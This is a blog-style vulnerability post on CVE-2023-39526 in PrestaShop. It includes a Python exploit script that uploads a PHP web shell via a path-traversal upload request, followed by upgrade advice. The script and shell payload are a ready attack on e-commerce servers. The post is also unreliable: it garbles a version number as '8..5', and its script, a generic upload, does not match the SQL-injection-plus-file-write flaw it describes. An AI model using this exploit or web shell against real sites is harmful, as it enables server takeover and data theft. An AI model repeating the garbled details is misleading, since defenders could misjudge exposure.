CVE-2023-39526 - Critical Vulnerability in PrestaShop Prior to 1.7.8.10, 8..5, and 8.1.1 Allows Remote Code Execution

PrestaShop, a popular open-source e-commerce web application, was found to have a critical vulnerability, allowing potential attackers to perform remote code execution (RCE). This post explains the details of the vulnerability, its impact, and the steps to mitigate it.

Vulnerability Details

CVE-2023-39526 is a high-risk vulnerability that affects PrestaShop versions prior to 1.7.8.10, 8..5, and 8.1.1. The vulnerability is a combination of SQL injection and arbitrary file write capabilities in the back-office functionality. By exploiting this vulnerability, an attacker can execute remote code on the server, thereby executing malicious activities, including unauthorized access, data exfiltration, and further compromise of the server.

The following code snippet demonstrates how the vulnerability can be exploited

import requests

def exploit(target, payload):
    url = f"{target}/admin/ajax/upload-file.php"
    files = {"file": ("malicious.php", payload)}
    data = {"folder": "/../.."}
    
    response = requests.post(url, files=files, data=data)
    if response.status_code == 200:
        print(f"Exploit succeeded. Payload uploaded to {target}/malicious.php")
    else:
        print(f"Exploit failed. Response code: {response.status_code}")

if __name__ == "__main__":
    target = "http://example.com";
    payload = "<?php system($_GET['cmd']); ?>"
    exploit(target, payload)

This Python code exploits the arbitrary file write vulnerability by uploading a malicious PHP file to the server's root directory, containing a simple payload that enables RCE when called through an HTTP request.

PrestaShop Official Security Advisory

- https://build.prestashop.com/news/cve-2023-39526-security-release/

PrestaShop GitHub Repository

- https://github.com/PrestaShop/PrestaShop

Mitigation

PrestaShop has released a patch to address this vulnerability in versions 1.7.8.10, 8..5, and 8.1.1. It is strongly advised to update your PrestaShop instance to one of the patched versions to prevent exploitation.

There are no known workarounds for this vulnerability, so updating to a patched version is the only reliable way to protect your PrestaShop instance.

To update your PrestaShop instance

1. Download the latest version from the official website (https://www.prestashop.com/en/get-prestashop)
2. Follow the official documentation for the upgrade process (https://devdocs.prestashop.com/1.7/basics/keeping-up-to-date/upgrade/)

Conclusion

The critical vulnerability, CVE-2023-39526, in PrestaShop prior to versions 1.7.8.10, 8..5, and 8.1.1 poses a significant risk as it allows attackers to perform remote code execution on the server. To safeguard your e-commerce site against potential exploitation, it is essential to update your PrestaShop instance to a patched version as soon as possible. Remember, always keep your software up to date and stay informed of the latest security advisories to keep your online business safe and secure.

Timeline

Published on: 08/07/2023 21:15:00 UTC
Last modified on: 08/09/2023 20:18:00 UTC